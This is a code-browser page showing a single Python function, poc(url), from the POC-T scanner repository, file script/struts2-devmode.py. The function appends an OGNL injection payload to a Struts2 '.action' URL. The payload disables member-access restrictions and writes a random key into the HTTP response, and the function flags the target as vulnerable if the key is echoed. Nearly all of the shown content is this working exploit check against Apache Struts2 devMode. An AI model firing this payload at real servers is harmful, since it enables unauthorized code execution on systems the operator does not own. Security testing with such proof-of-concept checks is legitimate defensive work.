MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/struts2-devmode.py:21–37  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

19
20
21def poc(url):
22 if '://' not in url:
23 url = 'http://' + url
24 if '?' in url:
25 url = url.split('?')[0]
26 if '.action' not in url:
27 url = redirectURL(url)
28 key = randomString()
29 payload = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
30 target = (url + payload)
31 try:
32 c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
33 if key in c and 'xwork2.dispatcher' not in c:
34 return url
35 except Exception, e:
36 return False
37 return False

Callers

nothing calls this directly

Calls 5

redirectURLFunction · 0.90
randomStringFunction · 0.90
firefoxFunction · 0.90
splitMethod · 0.80
getMethod · 0.80

Tested by

no test coverage detected